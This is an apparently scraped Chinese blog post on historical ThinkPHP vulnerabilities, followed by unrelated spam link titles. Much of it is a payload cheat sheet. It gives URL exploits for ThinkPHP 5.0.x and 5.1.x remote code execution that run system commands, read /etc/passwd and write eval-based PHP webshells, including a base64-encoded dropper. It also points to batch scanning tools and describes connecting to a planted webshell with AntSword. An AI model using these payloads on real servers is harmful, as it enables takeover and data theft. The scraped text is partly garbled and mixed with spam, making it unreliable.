当前位置: 首页 > news >正文

wordpress 主题 edu西安网站推广优化

wordpress 主题 edu,西安网站推广优化,泉州互联网公司排名,公众号怎么制作二维码常见历史漏洞之Thinkphp 一、介绍二、Thinkphp历史漏洞三、Thinkphp特征发现四、批量漏洞检测五、漏洞总结六、5.0.23版本案例演示 一、介绍 Thinkphp是一种开源框架。是一个由国人开发的支持windows/Unix/Linux等服务器环境的轻量级PHP开发框架。很多cms就是基于thinkphp二次开… 常见历史漏洞之Thinkphp 一、介绍二、Thinkphp历史漏洞三、Thinkphp特征发现四、批量漏洞检测五、漏洞总结六、5.0.23版本案例演示 一、介绍 Thinkphp是一种开源框架。是一个由国人开发的支持windows/Unix/Linux等服务器环境的轻量级PHP开发框架。很多cms就是基于thinkphp二次开发的所以thinkphp出问题的话会影响很多基于thinkphp开发的网站。 二、Thinkphp历史漏洞 ThinkPHP3.2.3_缓存函数设计缺陷可导致GetshellThinkPHP5_SQL注入漏洞敏感信息泄露ThinkPHP3.2.3_最新版update注入漏洞ThinkPHP5.0.10缓存函数设计缺陷可导致GetshellThinkPHP3.2.X_find_select_delete注入ThinkPHP框架5.0.X_sql注入漏洞分析ThinkPHP3.X_order_by注入漏洞ThinkPHP5.X_order_by注入漏洞ThinkPHP5.X_远程代码执行 三、Thinkphp特征发现 默认页面 错误页面 开启了debug模式的错误页面 - 未开启debug模式的错误页面四、批量漏洞检测 https://github.com/Lucifer1993/TPscan python TPscan.pyhttps://github.com/theLSA/tp5-getshell python2.7 tp5-getshell.py -u http://192.168.9.148:8080/说明漏洞存在可以进行漏洞利用。使用ThinkphpGUI-1.2-SNAPSHOT进行漏洞扫描和命令执行。 切换版本进行命令执行。 五、漏洞总结 Thinkphp3 漏洞总结https://y4er.com/post/thinkphp3-vuln/ Thinkphp5 RCE总结https://y4er.com/post/thinkphp5-rce/ 5.0.* 常用PoC #执行命令 /index.php?sindex/think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]whoami /index.php?sindex/think\app/invokefunctionfunctioncall_user_func_arrayvars[0]phpinfovars[1][]1#写入Webshell /index.php?sindex/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]file_put_contentsvars[1][]shell.phpvars[1][]?php eval($_POST[ccc]);?/index.php?sindex/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]echo -n YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ3hzcyddKTs/PmJiYg | base64 -d shell9.php 5.1.* 常用PoC #执行命令 /index.php?sindex/\think\Container/invokefunctionfunctioncall_user_func_arrayvars[0]phpinfovars[1][]1 /index.php?sindex/\think\Container/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]whoami /index.php?sindex/\think\Request/inputfiltersystemdataid (dir ls) /index.php?s/index/\think\request/cachekey1|phpinfo#写入Webshell /index.php?sindex/\think\Container/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]echo ?php eval($_POST[ccc]);? shell.php (echo ^?php eval($_POST[ccc]);?^ shell1.php)/index.php?sindex/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1]]whoami /index.php?sindex/\think\Request/inputfilterphpinfodata1 /index.php?sindex/\think\Request/inputfiltersystemdataid (dir ls) /index.php?sindex/\think\template\driver\file/writecacheFileshell.phpcontent%3C?php%20phpinfo();?%3E /index.php?sindex/\think\view\driver\Php/displaycontent%3C?php%20phpinfo();?%3E /index.php?sindex/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]phpinfovars[1][]1六、5.0.23版本案例演示 1、查看。 #查看 /index.php?scaptcha _method__constructfilter[]systemmethodgetserver[REQUEST_METHOD]cat /etc/passwd_method__constructfilter[]systemmethodgetserver[REQUEST_METHOD]ls2、写入木马文件。 /index.php?scaptcha _method__constructfilter[]systemmethodgetserver[REQUEST_METHOD]echo ?php eval(\$_POST[cmd]);? 1.php3、写入成功。 4、使用蚁剑进行连接。
http://www.pierceye.com/news/17827/

相关文章:

  • 江苏住房建设厅网站子主题wordpress插件
  • 学校学院网站建设目标效果图参考网站
  • 大型用户网站建设商丘互联网营销推广
  • wordpress 演示站国内网站建设哪家好
  • 沃然建站平台官网wordpress 更新过慢
  • 江苏茂盛建设有限公司网站湖南网页制作公司
  • 优化网站标题和描述的方法网站icp不备案有关系吗
  • 大学生做网站怎么赚钱青海省建设局网站首页
  • 免费做网站的优缺点内蒙和城乡建设部网站
  • 河南省建设行业证书查询网站中国代加工网站
  • 淄博做网站的网络公司软件设计工具有哪些
  • 百度深圳网站开发搜索视频制作软件推荐
  • 全国最好的网站建设案例环境设计专业就业方向
  • 网站建设风格定位网站建设问题新闻资讯
  • 网站标签title河北省住房和城乡建设部网站首页
  • 商业网站是怎么做的广州番禺网站公司
  • 网站建设规划模板网站可分析
  • 中英文网站建站温州网站建设前十公司
  • 网站开发如何处理兼容性问题wordpress伪静态 page
  • 快递网站怎么做的网站建设加数据库
  • 网站seo分析报告如何做淘宝联盟网站的推广
  • 建设银行公积金预约网站移动端的网站怎么做
  • 定制彩票网站开发做网站要固定ip
  • 网站打开的速度慢登录免费注册网址
  • weex做网站搭建服务器教程
  • 2003服务器怎么挂网站万能浏览器app
  • 如何规划设计一个网站php网站开发txt
  • 网站ie8兼容性wordpress修改固定连接403
  • 西宁网站设计网站空间选linux
  • 梦幻西如何建立网站做代练中国航空港建设总公司网站